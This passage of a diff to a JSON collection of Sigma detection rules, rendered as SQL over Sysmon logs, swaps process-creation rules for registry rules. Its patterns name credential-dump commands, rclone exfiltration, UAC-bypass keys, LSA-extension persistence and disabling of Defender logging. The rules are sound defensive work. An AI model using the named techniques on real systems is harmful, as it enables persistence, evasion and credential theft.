where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Might trigger if a legitimate new SIP provider is registered. 
But this is not a common occurrence in an environment and should be investigated either way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR 
CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 
'%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR 
CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' 
OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_public_folder.yml" - }, - { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], "falsepositives": [ - "Software installation" 
+ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - 
"status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + "Other Antivirus software installations could 
cause Windows to disable that eventlog (unknown)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (Image LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (Image LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR Image LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR 
CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "status": "experimental", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.t1546.012" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE 
